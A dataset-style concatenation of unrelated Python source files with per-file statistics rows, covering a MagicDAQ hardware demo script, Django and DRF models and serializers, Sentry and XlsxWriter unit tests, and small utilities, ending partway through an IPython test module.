raise Exception("Numerical format of value should be specified as 'valuetype', not 'format'")
if 'keyformat' in params:
raise Exception("Numerical format of key should be specified as 'keytype', not 'keyformat'")
return params
def writeSeriesConfig(outputDirPath, nkeys, nvalues, keyType='int16', valueType='int16',
confFilename="conf.json", overwrite=True, awsCredentialsOverride=None):
"""
Helper function to write out a conf.json file with required information to load Series binary data.
"""
import json
from thunder.rdds.fileio.writers import getFileWriterForPath
filewriterClass = getFileWriterForPath(outputDirPath)
# write configuration file
# config JSON keys are lowercased "valuetype", "keytype", not valueType, keyType
conf = {'input': outputDirPath,
'nkeys': nkeys, 'nvalues': nvalues,
'valuetype': str(valueType), 'keytype': str(keyType)}
confWriter = filewriterClass(outputDirPath, confFilename, overwrite=overwrite,
awsCredentialsOverride=awsCredentialsOverride)
confWriter.writeFile(json.dumps(conf, indent=2))
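# For reference, the conf.json written above looks roughly like this
# (field values are illustrative):
# {
#   "input": "/path/to/series/output",
#   "nkeys": 3,
#   "nvalues": 240,
#   "valuetype": "int16",
#   "keytype": "int16"
# }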
# touch "SUCCESS" file as final action
successWriter = filewriterClass(outputDirPath, "SUCCESS", overwrite=overwrite,
awsCredentialsOverride=awsCredentialsOverride)
successWriter.writeFile('')
| 48.772619 | 124 | 0.631648 | 4,517 | 40,969 | 5.706221 | 0.166261 | 0.015131 | 0.004656 | 0.008147 | 0.483531 | 0.462347 | 0.431814 | 0.415364 | 0.405005 | 0.401979 | 0 | 0.00572 | 0.291611 | 40,969 | 839 | 125 | 48.830751 | 0.8824 | 0.068125 | 0 | 0.309582 | 0 | 0.002457 | 0.07226 | 0.005884 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002457 | 0.068796 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7dedb48cc1d235760b585e1ff0e7c005780aeec | 491 | py | Python | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.1.1 on 2020-12-16 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Scheduler',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('minutes', models.IntegerField(default=15)),
],
),
]
| 22.318182 | 114 | 0.578411 | 50 | 491 | 5.62 | 0.78 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049563 | 0.301426 | 491 | 21 | 115 | 23.380952 | 0.769679 | 0.09165 | 0 | 0 | 1 | 0 | 0.045045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e2f163fdb11300c85e2c17e27cb56d8ee3f07e | 12,844 | py | Python | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | 1 | 2021-05-20T21:11:13.000Z | 2021-05-20T21:11:13.000Z | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | null | null | null | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | null | null | null | ##############################################################
#*** MagicDAQ USB DAQ and M&A Board General Demo Script ***
##############################################################
#*** Websites ***
# MagicDAQ Website:
# https://www.magicdaq.com/
# API Docs Website:
# https://magicdaq.github.io/magicdaq_docs/
#*** Install MagicDAQ ***
# Download the MagicDAQ python package from pypi
# Run this command in a command prompt:
# python -m pip install magicdaq
# Further docs: https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ
# MagicDAQ is only compatible with Python 3 on Windows; it does not currently work on Linux or with Python 2.
#*** Using Auto Code Complete With PyCharm ***
# Using a code editor like Pycharm and want to get auto complete working for the MagicDAQ package?
# Docs: https://magicdaq.github.io/magicdaq_docs/#/PyCharmCodeCompletion
##############################################################
#*** Imports ***
##############################################################
import sys
import time
# Import MagicDAQ
print('*** MagicDAQ Install Check ***')
print('')
try:
# Import MagicDAQDevice object
from magicdaq.api_class import MagicDAQDevice
# Create daq_one object
daq_one = MagicDAQDevice()
print('GOOD: MagicDAQ API is installed properly.')
# Get MagicDAQ Driver Version
driver_version = daq_one.get_driver_version()
if driver_version == 1.0:
print('GOOD: MagicDAQ Driver is installed properly.')
print('You are ready to use MagicDAQ!')
else:
print('ERROR: MagicDAQ Driver version not expected value: '+str(driver_version))
print('Try installing MagicDAQ using pip again.')
print('https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ')
print('Feel free to email MagicDAQ Support at: support@magicdaq.com')
except Exception as exception_text:
print('Original exception: ')
print(exception_text)
print('')
print('ERROR: Unable to import MagicDAQ API.')
    print('Most likely, MagicDAQ has not been properly downloaded and installed using pip.')
print('Please consult MagicDAQ API Docs: https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ')
print('Feel free to email MagicDAQ Support at: support@magicdaq.com')
sys.exit(0)
##############################################################
#*** MagicDAQ USB DAQ MDAQ300 Features Demo ***
##############################################################
# This portion of the script shows off some of the USB DAQ's features
# Hardware docs: https://www.magicdaq.com/product/magic-daq/
print('')
print('*** MagicDAQ USB DAQ Demo ***')
print('Ensure the USB DAQ is plugged into the computer using the USB cable.')
print('The DAQ does not need to be connected to the M&A board.')
print('')
user_input = input('Press any key to continue.')
#*** Open DAQ Device ***
# Remember, the daq_one object has already been created in the above 'Imports' section
# We must open the daq device before performing any hardware feature manipulation
# https://magicdaq.github.io/magicdaq_docs/#/MagicDAQ_Basics
daq_one.open_daq_device()
###############################################################
#*** Analog Output Demo: Constant, Sine, and PWM on AO1 Pin ***
###############################################################
print('')
print('--- Analog Output Demo: Constant, Sine, and PWM Output ---')
# Set constant 3 volt output voltage on AO1 pin
daq_one.set_analog_output(1,3)
print('Using an oscilloscope, place the scope probe on pin AO1 and connect the scope probe GND to one of the USB DAQ\'s AGND pins')
print('You should now observe a constant 3V')
print('')
user_input = input('Press any key to continue.')
# Configure and start 300Hz sine wave with 2V amplitude on AO1 pin
daq_one.configure_analog_output_sine_wave(1,300,amplitude=2)
daq_one.start_analog_output_wave(1)
print('You should now observe a 300Hz sine wave with 2V amplitude.')
print('')
user_input = input('Press any key to continue.')
# Stop previous wave
daq_one.stop_analog_output_wave(1)
# Configure and start PWM wave, 200 Hz, 50% duty cycle, 3.3V amplitude
daq_one.configure_analog_output_pwm_wave(1,200,50,amplitude=3.3)
daq_one.start_analog_output_wave(1)
print('You should now observe a 200Hz PWM wave, 50% duty cycle, with 3.3V amplitude.')
print('')
user_input = input('Press any key to continue.')
# Stop the wave
daq_one.stop_analog_output_wave(1)
print('The wave should now stop. You could set it to GND using set_analog_output() if you wanted.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Pulse Counter Pin Demo: PWM waves ***
###############################################################
print('')
print('--- Pulse Counter Pin Demo: PWM Waves ---')
# Configure a 50 KHz frequency, 75% duty cycle, continuous PWM Wave on the counter pin (CTR0)
# Note that unlike the analog output pins, the CTR0 pin always outputs at an amplitude of 3.3V when producing PWM waves
daq_one.configure_counter_pwm(50000,75)
# Start counter wave
daq_one.start_counter_pwm()
print('Place your scope probe on pin CTR0')
print('You should see a 50kHz, 75% duty cycle PWM wave.')
print('')
user_input = input('Press any key to continue.')
# Now stopping the counter PWM wave
daq_one.stop_counter_pwm()
print('The PWM wave will now stop.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Pulse Counter Pin Demo: Pulse Counting ***
###############################################################
print('')
print('--- Pulse Counter Pin Demo: Pulse Counting ---')
print('Use a piece of wire to bridge CTR0 to DGND several times')
print('CTR0 has an internal pull up resistor. You are simulating a pulse pulling the voltage to GND.')
print('You will have 8 sec to simulate some pulses.')
print('')
user_input = input('Press any key when you are ready to start.')
# Start the Pulse Counter
# Pulses will be counted on the falling edge
daq_one.enable_pulse_counter()
# Sleep for 8 sec
time.sleep(8)
# Read number of pulses
print('Number of pulses counted: '+str(daq_one.read_pulse_counter()))
print('You are using a piece of wire, so it is likely bouncing on and off the screw terminal, counting many pulses')
print('')
user_input = input('Stop simulating pulses. Press any key to continue.')
print('')
print('Now clearing the pulse counter')
daq_one.clear_pulse_counter()
print('Pulse count after clearing: '+str(daq_one.read_pulse_counter()))
###############################################################
#*** Digital Pin Demo ***
###############################################################
print('')
print('--- Digital Pin Demo ---')
# Set P0.0 pin LOW
daq_one.set_digital_output(0,0)
print('Place scope probe on pin P0.0, pin should be LOW')
print('')
user_input = input('Press any key to continue.')
# Set P0.0 pin HIGH
daq_one.set_digital_output(0,1)
print('Place scope probe on pin P0.0, pin should be HIGH')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Analog Input Pin Demo ***
###############################################################
print('')
print('--- Analog Input Pin Demo ---')
# Single ended voltage measurement
print('Apply voltage to AI0 pin. If you don\'t have a power supply handy, you can run a wire from the +5V pin to the AI0 pin.')
print('')
user_input = input('Press any key to continue.')
print('Voltage measured at AI0: '+str(daq_one.read_analog_input(0)))
print('If you are using the +5V pin, remember that this voltage is derived from the USB power supply, so it will be whatever your USB bus is producing, probably something slightly less than 5V.')
# If you want to perform a differential input measurement
# daq_one.read_diff_analog_input()
# https://magicdaq.github.io/magicdaq_docs/#/read_diff_analog_input
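# For example (sketch; the exact channel arguments are described in the docs
# linked above):
# diff_voltage = daq_one.read_diff_analog_input(0)
# print('Differential voltage: ' + str(diff_voltage))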
###############################################################
#*** M&A Board Demo ***
###############################################################
# M&A Board hardware spec:
# https://www.magicdaq.com/product/ma-board-full-kit/
print('')
print('*** M&A Board Demo ***')
print('Ensure the USB DAQ is connected to the M&A board using the ribbon cable.')
print('Ribbon cable pin out on page 6 of: ')
print('https://www.magicdaq.com/mdaq350datasheet/')
print('Use the provided power cable to apply power to the M&A board.')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Relay Demo ***
###############################################################
print('')
print('--- Relay Demo ---')
print('Setting all relays to closed.')
daq_one.set_digital_output(7, 1)
daq_one.set_digital_output(6, 1)
daq_one.set_digital_output(5, 1)
daq_one.set_digital_output(4, 1)
time.sleep(1)
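# Relays 1 through 4 map to digital pins 7 down to 4, so the loop below steps
# the two counters in opposite directions.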
relay_count = 1
digital_pin_count = 7
while relay_count <= 4:
print('Relay #: ' + str(relay_count) + ' Digital Pin #: ' + str(digital_pin_count))
# Set relay to open
print('Setting relay to OPEN.')
daq_one.set_digital_output(digital_pin_count, 0)
time.sleep(1)
# Increment counters
relay_count += 1
digital_pin_count -= 1
print('')
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Vout Demo ***
###############################################################
print('')
print('--- Vout Demo ---')
print('Vout provides a variable voltage power output capable of up to 2A')
print('By characterizing your M&A board or building a feedback loop, the voltage accuracy of Vout can be made quite good.')
print('See notes on page 4 of the M&A data sheet.')
print('https://www.magicdaq.com/mdaq350datasheet/')
# See the M&A board data sheet for the equation that describes the Vout to Vout_set (0 and 2.77 here) relationship
print('')
print('Vout_set set to 0V.')
print('Measure Vout with a multimeter. It should be about 10V')
daq_one.set_analog_output(0, 0)
print('')
user_input = input('Press any key to continue.')
print('Vout_set set to 2.77V')
print('Measure Vout with a multimeter. It should be about 5V')
daq_one.set_analog_output(0, 2.77)
print('')
user_input = input('Press any key to continue.')
###############################################################
#*** Low Current Measurement Demo: A1 ***
###############################################################
print('')
print('--- A1 Low Current Measurement Demo ---')
print('Use the 3.3V board voltage and a 20K resistor to put 165uA through A1.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_4_voltage = daq_one.read_analog_input(4)
print('Read voltage: ' + str(pin_4_voltage))
calculated_current_amps = pin_4_voltage / (332 * 97.863)
ua_current = round((calculated_current_amps / .000001), 3)
print('Calculated uA current: ' + str(ua_current))
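# Worked example (illustrative numbers): 165uA through the A1 sense path reads
# 0.000165 * 332 * 97.863 ~= 5.36 V at analog input 4.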
###############################################################
#*** Current Measurement Demo: A2 ***
###############################################################
print('')
print('--- A2 Current Measurement Demo (+/- 5A max) ---')
print('Use an external 5V power supply and 5 ohm power resistor to put 1 Amp through A2.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_5_voltage = daq_one.read_analog_input(5)
print('Read voltage: ' + str(pin_5_voltage))
calculated_current_amps = pin_5_voltage / (.01 * 200)
# ma_current = round((calculated_current_amps / .001), 3)
print('Calculated A current: ' + str(calculated_current_amps))
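# Worked example (illustrative numbers): 1 A through the 0.01 ohm shunt with a
# gain of 200 reads 1 * 0.01 * 200 = 2.0 V at analog input 5.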
###############################################################
#*** Current Measurement Demo: A3 ***
###############################################################
print('')
print('--- A3 Current Measurement Demo (+/- 1.5A max) ---')
print('Use an external 5V power supply and 5 ohm power resistor to put 1 Amp through A3.')
print('')
user_input = input('Press any key to continue.')
# See the M&A board data sheet for the equation that describes the Vout to current relationship
pin_6_voltage = daq_one.read_analog_input(6)
print('Read voltage: ' + str(pin_6_voltage))
calculated_current_amps = pin_6_voltage / (.033 * 200)
ma_current = round((calculated_current_amps / .001), 3)
print('Calculated mA current: ' + str(ma_current))
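# Worked example (illustrative numbers): 0.5 A through the 0.033 ohm shunt with
# a gain of 200 reads 0.5 * 0.033 * 200 = 3.3 V at analog input 6.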
###############################################################
#*** Demo Complete. ***
###############################################################
# Close connection to daq
daq_one.close_daq_device()
| 34.342246 | 196 | 0.617642 | 1,740 | 12,844 | 4.445402 | 0.201149 | 0.026374 | 0.034389 | 0.046671 | 0.434131 | 0.374014 | 0.287524 | 0.256238 | 0.242017 | 0.203749 | 0 | 0.019084 | 0.135083 | 12,844 | 373 | 197 | 34.434316 | 0.677199 | 0.236998 | 0 | 0.357955 | 0 | 0.028409 | 0.518131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022727 | 0 | 0.022727 | 0.613636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
c7e32e60b520a7528f6c33e61490ce039febd1e0 | 2,257 | py | Python | src/account/api/serializers.py | amirpsd/drf_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | 33 | 2022-02-11T12:16:29.000Z | 2022-03-26T15:08:47.000Z | src/account/api/serializers.py | amirpsd/django_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | null | null | null | src/account/api/serializers.py | amirpsd/django_blog_api | 58be081a450840114af021e7412e469fad90456d | [
"MIT"
] | 5 | 2022-02-11T13:03:52.000Z | 2022-03-28T16:04:32.000Z | from django.contrib.auth import get_user_model
from rest_framework import serializers
class UsersListSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
fields = [
"id", "phone",
"first_name", "last_name",
"author",
]
class UserDetailUpdateDeleteSerializer(serializers.ModelSerializer):
class Meta:
model = get_user_model()
exclude = [
"password",
]
class UserProfileSerializer(serializers.ModelSerializer):
phone = serializers.ReadOnlyField()
class Meta:
model = get_user_model()
fields = [
"id", "phone",
"first_name", "last_name",
"two_step_password",
]
class AuthenticationSerializer(serializers.Serializer):
phone = serializers.CharField(
max_length=12,
min_length=12,
)
def validate_phone(self, value):
from re import match
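# The pattern accepts 12-digit numbers beginning with 989, e.g. 989121234567.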
if not match("^989\d{2}\s*?\d{3}\s*?\d{4}$", value):
raise serializers.ValidationError("Invalid phone number.")
return value
class OtpSerializer(serializers.Serializer):
code = serializers.CharField(
max_length=6,
min_length=6,
)
password = serializers.CharField(
max_length=20,
required=False,
)
def validate_code(self, value):
try:
int(value)
except ValueError:
raise serializers.ValidationError("Invalid Code.")
return value
class GetTwoStepPasswordSerializer(serializers.Serializer):
"""
Base serializer for the two-step password.
"""
password = serializers.CharField(
max_length=20,
)
confirm_password = serializers.CharField(
max_length=20,
)
def validate(self, data):
password = data.get('password')
confirm_password = data.get('confirm_password')
if password != confirm_password:
raise serializers.ValidationError(
{"Error": "Your passwords didn't match."}
)
return data
class ChangeTwoStepPasswordSerializer(GetTwoStepPasswordSerializer):
old_password = serializers.CharField(
max_length=20,
)
| 23.030612 | 70 | 0.613646 | 209 | 2,257 | 6.478469 | 0.368421 | 0.088626 | 0.10192 | 0.128508 | 0.255539 | 0.255539 | 0.140325 | 0.140325 | 0.082718 | 0.082718 | 0 | 0.012492 | 0.290651 | 2,257 | 97 | 71 | 23.268041 | 0.833229 | 0.015064 | 0 | 0.289855 | 0 | 0 | 0.091693 | 0.01271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.173913 | 0.043478 | 0 | 0.376812 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e62258b56e4e6157b37bc5877b4350133a63c1 | 1,676 | py | Python | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | tests/sentry/api/serializers/test_saved_search.py | practo/sentry | 82f530970ce205696469fa702246396acfd947a1 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.models import SavedSearch
from sentry.models.savedsearch import DEFAULT_SAVED_SEARCHES
from sentry.testutils import TestCase
class SavedSearchSerializerTest(TestCase):
def test_simple(self):
search = SavedSearch.objects.create(
project=self.project,
name='Something',
query='some query'
)
result = serialize(search)
assert result['id'] == six.text_type(search.id)
assert result['projectId'] == six.text_type(search.project_id)
assert result['name'] == search.name
assert result['query'] == search.query
assert result['isDefault'] == search.is_default
assert result['isUserDefault'] == search.is_default
assert result['dateCreated'] == search.date_added
assert not result['isPrivate']
assert not result['isGlobal']
def test_global(self):
default_saved_search = DEFAULT_SAVED_SEARCHES[0]
search = SavedSearch(
name=default_saved_search['name'],
query=default_saved_search['query'],
is_global=True,
)
result = serialize(search)
assert result['id'] == six.text_type(search.id)
assert result['projectId'] is None
assert result['name'] == search.name
assert result['query'] == search.query
assert not result['isDefault']
assert not result['isUserDefault']
assert result['dateCreated'] == search.date_added
assert not result['isPrivate']
assert result['isGlobal']
| 33.52 | 70 | 0.648568 | 182 | 1,676 | 5.82967 | 0.285714 | 0.147031 | 0.070688 | 0.048068 | 0.422243 | 0.382658 | 0.382658 | 0.382658 | 0.382658 | 0.382658 | 0 | 0.00158 | 0.24463 | 1,676 | 49 | 71 | 34.204082 | 0.836493 | 0.01253 | 0 | 0.3 | 0 | 0 | 0.101633 | 0 | 0 | 0 | 0 | 0 | 0.45 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e63e3b77d732305764d664c862b2625865bf3a | 864 | py | Python | xastropy/files/general.py | bpholden/xastropy | 66aff0995a84c6829da65996d2379ba4c946dabe | [
"BSD-3-Clause"
] | 3 | 2015-08-23T00:32:58.000Z | 2020-12-31T02:37:52.000Z | xastropy/files/general.py | Kristall-WangShiwei/xastropy | 723fe56cb48d5a5c4cdded839082ee12ef8c6732 | [
"BSD-3-Clause"
] | 104 | 2015-07-17T18:31:54.000Z | 2018-06-29T17:04:09.000Z | xastropy/files/general.py | Kristall-WangShiwei/xastropy | 723fe56cb48d5a5c4cdded839082ee12ef8c6732 | [
"BSD-3-Clause"
] | 16 | 2015-07-17T15:50:37.000Z | 2019-04-21T03:42:47.000Z | """
#;+
#; NAME:
#; general
#; Version 1.0
#;
#; PURPOSE:
#; Module for monkeying with files and filenames
#; 17-Sep-2014 by JXP
#;-
#;------------------------------------------------------------------------------
"""
# Import libraries
import numpy as np
from astropy.io import fits
from astropy.io import ascii
import os, pdb
#### ###############################
# Deal with .gz extensions, usually on FITS files
# See if filenm exists, if so pass it back
#
def chk_for_gz(filenm,chk=None):
import os, pdb
# File exist?
if os.path.lexists(filenm):
chk=1
return filenm, chk
# .gz already
if filenm.find('.gz') > 0:
chk=0
return filenm, chk
# Add .gz
if os.path.lexists(filenm+'.gz'):
chk=1
return filenm+'.gz', chk
else:
chk=0
return filenm, chk
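# Example usage (sketch):
# fname, chk = chk_for_gz('spectrum.fits')
# if chk:
#     hdulist = fits.open(fname)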
| 19.2 | 80 | 0.508102 | 107 | 864 | 4.084112 | 0.504673 | 0.102975 | 0.102975 | 0.086957 | 0.183066 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021841 | 0.258102 | 864 | 44 | 81 | 19.636364 | 0.659906 | 0.417824 | 0 | 0.5 | 0 | 0 | 0.019824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.277778 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c7e69418daeb84532c16aa76c96e7a0136b72521 | 655 | py | Python | setup.py | muatik/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 54 | 2015-01-19T22:53:48.000Z | 2021-06-23T03:48:05.000Z | setup.py | nejdetckenobi/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 4 | 2016-05-23T13:52:12.000Z | 2021-05-14T10:24:37.000Z | setup.py | nejdetckenobi/genderizer | 9866bf0371d1d984f6c4465ff78025d911f6a648 | [
"MIT"
] | 18 | 2015-01-30T00:06:40.000Z | 2021-03-12T14:56:12.000Z | #!/usr/bin/env python
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='genderizer',
version='0.1.2.3',
license='MIT',
description='Genderizer tries to infer gender information looking at first name and/or making text analysis',
long_description=open('README.md').read(),
url='https://github.com/muatik/genderizer',
author='Mustafa Atik',
author_email='muatik@gmail.com',
maintainer='Mustafa Atik',
maintainer_email='muatik@gmail.com',
packages=['genderizer'],
package_data={'genderizer': ['data/*']},
platforms='any') | 31.190476 | 115 | 0.668702 | 79 | 655 | 5.493671 | 0.721519 | 0.046083 | 0.069124 | 0.087558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007533 | 0.189313 | 655 | 21 | 116 | 31.190476 | 0.809793 | 0.030534 | 0 | 0 | 0 | 0 | 0.384252 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.176471 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7eb49aae87e95e2b4d243e5c05c7251bfbcbd52 | 2,508 | py | Python | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | 2 | 2019-07-25T06:08:09.000Z | 2019-11-01T02:33:56.000Z | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2019-07-14T00:29:05.000Z | 2019-11-26T06:16:46.000Z | xlsxwriter/test/worksheet/test_write_print_options.py | Aeon1/XlsxWriter | 6871b6c3fe6c294632054ea91f23d9e27068bcc1 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWritePrintOptions(unittest.TestCase):
"""
Test the Worksheet _write_print_options() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_print_options_default(self):
"""Test the _write_print_options() method without options"""
self.worksheet._write_print_options()
exp = """"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_hcenter(self):
"""Test the _write_print_options() method with horizontal center"""
self.worksheet.center_horizontally()
self.worksheet._write_print_options()
exp = """<printOptions horizontalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_vcenter(self):
"""Test the _write_print_options() method with vertical center"""
self.worksheet.center_vertically()
self.worksheet._write_print_options()
exp = """<printOptions verticalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_center(self):
"""Test the _write_print_options() method with horiz + vert center"""
self.worksheet.center_horizontally()
self.worksheet.center_vertically()
self.worksheet._write_print_options()
exp = """<printOptions horizontalCentered="1" verticalCentered="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_gridlines_default(self):
"""Test the _write_print_options() method with default value"""
self.worksheet.hide_gridlines()
self.worksheet._write_print_options()
exp = """"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_print_options_gridlines_0(self):
"""Test the _write_print_options() method with 0 value"""
self.worksheet.hide_gridlines(0)
self.worksheet._write_print_options()
exp = """<printOptions gridLines="1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| 28.179775 | 79 | 0.637161 | 269 | 2,508 | 5.669145 | 0.211896 | 0.12459 | 0.211803 | 0.119344 | 0.748197 | 0.691803 | 0.691803 | 0.61377 | 0.457705 | 0.378361 | 0 | 0.008147 | 0.216906 | 2,508 | 88 | 80 | 28.5 | 0.76833 | 0.192584 | 0 | 0.545455 | 0 | 0 | 0.085488 | 0.047493 | 0 | 0 | 0 | 0 | 0.136364 | 1 | 0.159091 | false | 0 | 0.068182 | 0 | 0.25 | 0.363636 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7f405a9090e4db54d759cf9f413be8921191675 | 3,890 | py | Python | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 3 | 2015-04-01T13:14:57.000Z | 2015-05-26T16:01:37.000Z | IPython/lib/tests/test_irunner_pylab_magic.py | dchichkov/ipython | 8096bb8640ee7e7c5ebdf3f428fe69cd390e1cd4 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-10-06T07:59:25.000Z | 2021-10-06T07:59:25.000Z | """Test suite for pylab_import_all magic
Modified from the irunner module but using regex.
"""
# Global to make tests extra verbose and help debugging
VERBOSE = True
# stdlib imports
import StringIO
import sys
import unittest
import re
# IPython imports
from IPython.lib import irunner
from IPython.testing import decorators
def pylab_not_importable():
"""Test if importing pylab fails with RuntimeError (true when having no display)"""
try:
import pylab
return False
except RuntimeError:
return True
# Testing code begins
class RunnerTestCase(unittest.TestCase):
def setUp(self):
self.out = StringIO.StringIO()
#self.out = sys.stdout
def _test_runner(self,runner,source,output):
"""Test that a given runner's input/output match."""
